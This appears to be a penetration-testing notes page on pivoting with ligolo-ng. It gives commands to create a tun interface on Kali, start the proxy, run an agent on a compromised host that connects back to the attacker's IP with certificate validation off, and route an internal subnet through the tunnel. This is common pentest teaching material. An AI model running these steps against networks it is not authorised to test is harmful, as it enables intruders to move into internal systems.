Pivoting

Let’s keep it simple and download the relevant files from the releases page on GitHub.

Kali

Open a terminal from the folder where you saved and extracted the proxy file. We need to run the following commands:

# Adds a new tun interface to our machine.  
sudo ip tuntap add user kali mode tun ligolo  
  
# Enables the new interface.  
sudo ip link set ligolo up

We are now ready to run our proxy file.

# With the -selfcert flag the tool dynamically  
# generates self-signed certificates.  
  
./proxy -selfcert

Once you run this, the tool will start listening at port 11601 on all interfaces and you will get access to the tool’s command line.

Victim Machine

Now we need to transfer the appropriate agent file to the host we’ve compromised using our preferred method of choice.

Now we can just run the following command to connect back to our attacking machine:

# The IP will be the IP of our Kali VM/attacking machine.  
# The -ignore-cert ignores certificate validation.  
# This means we won't have any issues with our self-signed certs.  
  
./agent -connect <IP_KAL>I:11601 -ignore-cert

kali

Now we can type session in ligolo-ng’s interface, this will list all our sessions and we can specify the one we want either by number or using the arrow keys.

ligolo-ng >> session
> 1

Then we need to open a new terminal and add the corresponding route to our ligolo-ng interface with the following command.

sudo ip route add x.x.x.x/24 dev ligolo

Going back to ligolo-ng we can now type startwhich will start a tunnel.

ligolo-ng >> start

PreviousUseful Files NextENUMERATION

Last updated 3 days ago